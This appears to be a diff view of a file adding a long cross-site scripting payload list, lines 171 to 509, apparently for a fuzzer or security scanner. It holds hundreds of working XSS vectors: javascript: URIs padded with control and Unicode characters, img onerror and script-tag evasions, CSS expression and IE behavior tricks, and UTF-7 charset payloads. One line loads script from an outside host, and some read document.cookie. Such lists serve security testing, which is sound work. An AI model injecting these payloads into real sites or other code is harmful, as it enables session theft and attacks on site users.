ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
|
|
172
|
+
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
|
|
173
|
+
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
174
|
+
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
175
|
+
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
176
|
+
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
177
|
+
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
178
|
+
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
179
|
+
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
180
|
+
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
181
|
+
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
182
|
+
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
183
|
+
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
184
|
+
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
185
|
+
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
186
|
+
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
187
|
+
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
188
|
+
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
189
|
+
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
190
|
+
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
191
|
+
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
192
|
+
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
193
|
+
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
194
|
+
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
195
|
+
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
196
|
+
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
197
|
+
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
198
|
+
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
199
|
+
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
200
|
+
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
201
|
+
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
202
|
+
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
203
|
+
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
204
|
+
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
205
|
+
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
206
|
+
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
207
|
+
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
208
|
+
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
209
|
+
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
210
|
+
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
211
|
+
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
212
|
+
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
213
|
+
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
214
|
+
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
215
|
+
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
216
|
+
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
217
|
+
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
218
|
+
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
219
|
+
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
220
|
+
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
221
|
+
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
222
|
+
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
223
|
+
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
224
|
+
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
225
|
+
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
226
|
+
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
227
|
+
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
228
|
+
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
229
|
+
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
|
|
230
|
+
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
|
|
231
|
+
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
|
|
232
|
+
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
|
|
233
|
+
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
|
|
234
|
+
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
|
|
235
|
+
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
|
|
236
|
+
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
|
|
237
|
+
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
|
|
238
|
+
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
|
|
239
|
+
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
|
|
240
|
+
"`'><script>\x3Bjavascript:alert(1)</script>
|
|
241
|
+
"`'><script>\x0Djavascript:alert(1)</script>
|
|
242
|
+
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
|
|
243
|
+
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
|
|
244
|
+
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
|
|
245
|
+
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
|
|
246
|
+
"`'><script>\x09javascript:alert(1)</script>
|
|
247
|
+
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
|
|
248
|
+
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
|
|
249
|
+
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
|
|
250
|
+
"`'><script>\x00javascript:alert(1)</script>
|
|
251
|
+
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
|
|
252
|
+
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
|
|
253
|
+
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
|
|
254
|
+
"`'><script>\x0Cjavascript:alert(1)</script>
|
|
255
|
+
"`'><script>\x2Bjavascript:alert(1)</script>
|
|
256
|
+
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
|
|
257
|
+
"`'><script>-javascript:alert(1)</script>
|
|
258
|
+
"`'><script>\x0Ajavascript:alert(1)</script>
|
|
259
|
+
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
|
|
260
|
+
"`'><script>\x7Ejavascript:alert(1)</script>
|
|
261
|
+
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
|
|
262
|
+
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
|
|
263
|
+
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
|
|
264
|
+
"`'><script>\xC2\x85javascript:alert(1)</script>
|
|
265
|
+
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
|
|
266
|
+
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
|
|
267
|
+
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
|
|
268
|
+
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
|
|
269
|
+
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
|
|
270
|
+
"`'><script>\x21javascript:alert(1)</script>
|
|
271
|
+
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
|
|
272
|
+
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
|
|
273
|
+
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
|
|
274
|
+
"`'><script>\x0Bjavascript:alert(1)</script>
|
|
275
|
+
"`'><script>\x20javascript:alert(1)</script>
|
|
276
|
+
"`'><script>\xC2\xA0javascript:alert(1)</script>
|
|
277
|
+
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
|
|
278
|
+
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
|
|
279
|
+
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
|
|
280
|
+
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
|
|
281
|
+
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
|
|
282
|
+
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
|
|
283
|
+
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
|
|
284
|
+
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
|
|
285
|
+
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
|
|
286
|
+
<script\x2F>javascript:alert(1)</script>
|
|
287
|
+
<script\x20>javascript:alert(1)</script>
|
|
288
|
+
<script\x0D>javascript:alert(1)</script>
|
|
289
|
+
<script\x0A>javascript:alert(1)</script>
|
|
290
|
+
<script\x0C>javascript:alert(1)</script>
|
|
291
|
+
<script\x00>javascript:alert(1)</script>
|
|
292
|
+
<script\x09>javascript:alert(1)</script>
|
|
293
|
+
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
|
|
294
|
+
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
|
|
295
|
+
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
|
|
296
|
+
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
|
|
297
|
+
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
|
|
298
|
+
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
|
|
299
|
+
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
|
|
300
|
+
<script>javascript:alert(1)<\x00/script>
|
|
301
|
+
<img src=# onerror\x3D"javascript:alert(1)" >
|
|
302
|
+
<input onfocus=javascript:alert(1) autofocus>
|
|
303
|
+
<input onblur=javascript:alert(1) autofocus><input autofocus>
|
|
304
|
+
<video poster=javascript:javascript:alert(1)//
|
|
305
|
+
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
|
|
306
|
+
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
|
|
307
|
+
<video><source onerror="javascript:javascript:alert(1)">
|
|
308
|
+
<video onerror="javascript:javascript:alert(1)"><source>
|
|
309
|
+
<form><button formaction="javascript:javascript:alert(1)">X
|
|
310
|
+
<body oninput=javascript:alert(1)><input autofocus>
|
|
311
|
+
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
|
|
312
|
+
<frameset onload=javascript:alert(1)>
|
|
313
|
+
<table background="javascript:javascript:alert(1)">
|
|
314
|
+
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
|
|
315
|
+
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
|
|
316
|
+
<![><img src="]><img src=x onerror=javascript:alert(1)//">
|
|
317
|
+
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
|
|
318
|
+
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
|
|
319
|
+
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
|
|
320
|
+
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
|
|
321
|
+
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
|
|
322
|
+
<object data="data:text/html;base64,%(base64)s">
|
|
323
|
+
<embed src="data:text/html;base64,%(base64)s">
|
|
324
|
+
<b <script>alert(1)</script>0
|
|
325
|
+
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
|
|
326
|
+
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
|
|
327
|
+
<embed src="javascript:alert(1)">
|
|
328
|
+
<img src="javascript:alert(1)">
|
|
329
|
+
<image src="javascript:alert(1)">
|
|
330
|
+
<script src="javascript:alert(1)">
|
|
331
|
+
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
|
|
332
|
+
<? foo="><script>javascript:alert(1)</script>">
|
|
333
|
+
<! foo="><script>javascript:alert(1)</script>">
|
|
334
|
+
</ foo="><script>javascript:alert(1)</script>">
|
|
335
|
+
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
|
|
336
|
+
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
|
|
337
|
+
<% foo><x foo="%><script>javascript:alert(1)</script>">
|
|
338
|
+
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
|
|
339
|
+
<img \x00src=x onerror="alert(1)">
|
|
340
|
+
<img \x47src=x onerror="javascript:alert(1)">
|
|
341
|
+
<img \x11src=x onerror="javascript:alert(1)">
|
|
342
|
+
<img \x12src=x onerror="javascript:alert(1)">
|
|
343
|
+
<img\x47src=x onerror="javascript:alert(1)">
|
|
344
|
+
<img\x10src=x onerror="javascript:alert(1)">
|
|
345
|
+
<img\x13src=x onerror="javascript:alert(1)">
|
|
346
|
+
<img\x32src=x onerror="javascript:alert(1)">
|
|
347
|
+
<img\x47src=x onerror="javascript:alert(1)">
|
|
348
|
+
<img\x11src=x onerror="javascript:alert(1)">
|
|
349
|
+
<img \x47src=x onerror="javascript:alert(1)">
|
|
350
|
+
<img \x34src=x onerror="javascript:alert(1)">
|
|
351
|
+
<img \x39src=x onerror="javascript:alert(1)">
|
|
352
|
+
<img \x00src=x onerror="javascript:alert(1)">
|
|
353
|
+
<img src\x09=x onerror="javascript:alert(1)">
|
|
354
|
+
<img src\x10=x onerror="javascript:alert(1)">
|
|
355
|
+
<img src\x13=x onerror="javascript:alert(1)">
|
|
356
|
+
<img src\x32=x onerror="javascript:alert(1)">
|
|
357
|
+
<img src\x12=x onerror="javascript:alert(1)">
|
|
358
|
+
<img src\x11=x onerror="javascript:alert(1)">
|
|
359
|
+
<img src\x00=x onerror="javascript:alert(1)">
|
|
360
|
+
<img src\x47=x onerror="javascript:alert(1)">
|
|
361
|
+
<img src=x\x09onerror="javascript:alert(1)">
|
|
362
|
+
<img src=x\x10onerror="javascript:alert(1)">
|
|
363
|
+
<img src=x\x11onerror="javascript:alert(1)">
|
|
364
|
+
<img src=x\x12onerror="javascript:alert(1)">
|
|
365
|
+
<img src=x\x13onerror="javascript:alert(1)">
|
|
366
|
+
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
|
|
367
|
+
<img src=x onerror=\x09"javascript:alert(1)">
|
|
368
|
+
<img src=x onerror=\x10"javascript:alert(1)">
|
|
369
|
+
<img src=x onerror=\x11"javascript:alert(1)">
|
|
370
|
+
<img src=x onerror=\x12"javascript:alert(1)">
|
|
371
|
+
<img src=x onerror=\x32"javascript:alert(1)">
|
|
372
|
+
<img src=x onerror=\x00"javascript:alert(1)">
|
|
373
|
+
<a href=javascript:javascript:alert(1)>XXX</a>
|
|
374
|
+
<img src="x` `<script>javascript:alert(1)</script>"` `>
|
|
375
|
+
<img src onerror /" '"= alt=javascript:alert(1)//">
|
|
376
|
+
<title onpropertychange=javascript:alert(1)></title><title title=>
|
|
377
|
+
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
|
|
378
|
+
<!--[if]><script>javascript:alert(1)</script -->
|
|
379
|
+
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
|
|
380
|
+
<script src="/\%(jscript)s"></script>
|
|
381
|
+
<script src="\\%(jscript)s"></script>
|
|
382
|
+
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
|
|
383
|
+
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
|
|
384
|
+
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
|
|
385
|
+
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
|
|
386
|
+
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
|
|
387
|
+
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
|
|
388
|
+
<style>*[{}@import'%(css)s?]</style>X
|
|
389
|
+
<div style="font-family:'foo ;color:red;';">XXX
|
|
390
|
+
<div style="font-family:foo}color=red;">XXX
|
|
391
|
+
<// style=x:expression\28javascript:alert(1)\29>
|
|
392
|
+
<style>*{x:expression(javascript:alert(1))}</style>
|
|
393
|
+
<div style=content:url(%(svg)s)></div>
|
|
394
|
+
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
|
|
395
|
+
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
|
|
396
|
+
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
|
|
397
|
+
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
|
|
398
|
+
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
|
|
399
|
+
<x style="background:url('x;color:red;/*')">XXX</x>
|
|
400
|
+
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
|
|
401
|
+
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
|
|
402
|
+
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
|
|
403
|
+
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
|
|
404
|
+
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
405
|
+
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
406
|
+
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
|
|
407
|
+
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
|
|
408
|
+
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
|
|
409
|
+
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
|
|
410
|
+
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
|
|
411
|
+
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
|
|
412
|
+
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
|
|
413
|
+
<x style="behavior:url(%(sct)s)">
|
|
414
|
+
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
|
|
415
|
+
<event-source src="%(event)s" onload="javascript:alert(1)">
|
|
416
|
+
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
|
|
417
|
+
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
|
|
418
|
+
<script>%(payload)s</script>
|
|
419
|
+
<script src=%(jscript)s></script>
|
|
420
|
+
<script language='javascript' src='%(jscript)s'></script>
|
|
421
|
+
<script>javascript:alert(1)</script>
|
|
422
|
+
<IMG SRC="javascript:javascript:alert(1);">
|
|
423
|
+
<IMG SRC=javascript:javascript:alert(1)>
|
|
424
|
+
<IMG SRC=`javascript:javascript:alert(1)`>
|
|
425
|
+
<SCRIPT SRC=%(jscript)s?<B>
|
|
426
|
+
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
|
|
427
|
+
<BODY ONLOAD=javascript:alert(1)>
|
|
428
|
+
<BODY ONLOAD=javascript:javascript:alert(1)>
|
|
429
|
+
<IMG SRC="jav ascript:javascript:alert(1);">
|
|
430
|
+
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
|
|
431
|
+
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
|
|
432
|
+
<<SCRIPT>%(payload)s//<</SCRIPT>
|
|
433
|
+
<IMG SRC="javascript:javascript:alert(1)"
|
|
434
|
+
<iframe src=%(scriptlet)s <
|
|
435
|
+
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
|
|
436
|
+
<IMG DYNSRC="javascript:javascript:alert(1)">
|
|
437
|
+
<IMG LOWSRC="javascript:javascript:alert(1)">
|
|
438
|
+
<BGSOUND SRC="javascript:javascript:alert(1);">
|
|
439
|
+
<BR SIZE="&{javascript:alert(1)}">
|
|
440
|
+
<LAYER SRC="%(scriptlet)s"></LAYER>
|
|
441
|
+
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
|
|
442
|
+
<STYLE>@import'%(css)s';</STYLE>
|
|
443
|
+
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
|
|
444
|
+
<XSS STYLE="behavior: url(%(htc)s);">
|
|
445
|
+
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
|
|
446
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
|
|
447
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
|
|
448
|
+
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
|
|
449
|
+
<TABLE BACKGROUND="javascript:javascript:alert(1)">
|
|
450
|
+
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
|
|
451
|
+
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
|
|
452
|
+
<DIV STYLE="width:expression(javascript:alert(1));">
|
|
453
|
+
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
|
|
454
|
+
<XSS STYLE="xss:expression(javascript:alert(1))">
|
|
455
|
+
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
|
|
456
|
+
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
|
|
457
|
+
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
|
|
458
|
+
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
|
|
459
|
+
<BASE HREF="javascript:javascript:alert(1);//">
|
|
460
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
|
|
461
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
|
|
462
|
+
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
|
463
|
+
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
|
|
464
|
+
<SCRIPT SRC="%(jpg)s"></SCRIPT>
|
|
465
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
|
|
466
|
+
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
|
|
467
|
+
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
|
|
468
|
+
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
|
|
469
|
+
<STYLE>@import'%(css)s';</STYLE>
|
|
470
|
+
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
|
|
471
|
+
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
|
|
472
|
+
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
|
|
473
|
+
<style onreadystatechange=javascript:javascript:alert(1);></style>
|
|
474
|
+
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
|
|
475
|
+
<embed code=%(scriptlet)s></embed>
|
|
476
|
+
<embed code=javascript:javascript:alert(1);></embed>
|
|
477
|
+
<embed src=%(jscript)s></embed>
|
|
478
|
+
<frameset onload=javascript:javascript:alert(1)></frameset>
|
|
479
|
+
<object onerror=javascript:javascript:alert(1)>
|
|
480
|
+
<embed type="image" src=%(scriptlet)s></embed>
|
|
481
|
+
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
|
|
482
|
+
<IMG SRC=&{javascript:alert(1);};>
|
|
483
|
+
<a href="javAascript:javascript:alert(1)">test1</a>
|
|
484
|
+
<a href="javaascript:javascript:alert(1)">test1</a>
|
|
485
|
+
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
|
|
486
|
+
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
|
|
487
|
+
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
|
|
488
|
+
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
|
|
489
|
+
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
490
|
+
'';!--"<XSS>=&{()}
|
|
491
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
492
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
493
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
494
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
495
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
496
|
+
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
497
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
498
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
499
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
500
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
501
|
+
<IMG SRC=# onmouseover="alert('xxs')">
|
|
502
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
|
503
|
+
<IMG onmouseover="alert('xxs')">
|
|
504
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
505
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
506
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
507
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
|
508
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
509
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
510
|
+
